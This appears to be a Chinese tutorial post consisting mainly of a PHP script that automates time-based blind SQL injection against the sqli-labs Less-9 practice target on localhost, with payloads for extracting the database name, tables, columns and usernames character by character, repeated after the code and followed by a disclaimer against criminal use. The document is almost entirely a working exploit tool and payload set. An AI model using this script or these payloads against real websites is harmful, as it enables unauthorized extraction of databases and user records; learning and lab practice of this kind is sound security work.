数据库自动盲注代码
<?php
function juhecurl($url,$params=false,$ispost=0){
$httpInfo = array();
$ch = curl_init();
curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 );
curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36' );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT , 30 );
curl_setopt( $ch, CURLOPT_TIMEOUT , 30);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER , true );
if( $ispost )
{
curl_setopt( $ch , CURLOPT_POST , true );
curl_setopt( $ch , CURLOPT_POSTFIELDS , $params );
curl_setopt( $ch , CURLOPT_URL , $url );
}
else
{
if($params){
curl_setopt( $ch , CURLOPT_URL , $url.'?'.$params );
}else{
curl_setopt( $ch , CURLOPT_URL , $url);
}
}
$response = curl_exec( $ch );
if ($response === FALSE) {
//echo "cURL Error: " . curl_error($ch);
return false;
}
$httpCode = curl_getinfo( $ch , CURLINFO_HTTP_CODE );
$httpInfo = array_merge( $httpInfo , curl_getinfo( $ch ) );
curl_close( $ch );
return $response;
}
//爆数据库
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
//爆表
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
//爆字段
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";
//爆数据
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
$url = 'http://127.0.0.1/SQLInj/sqli-labs/Less-9/';
for($i=1;$i<=40;$i++){
for($a=32;$a<=127;$a++){
$payload = sprintf($_Payload,$i,$a);
$b = "id=".urlencode($payload);
$begin_time=time();
$res = juhecurl($url,$b,0);
$end_time=time() - $begin_time;
if ($end_time>1){
echo chr($a);
break;
}
}
}
?>
爆数据库
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
爆表
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
爆字段
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";
爆数据
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护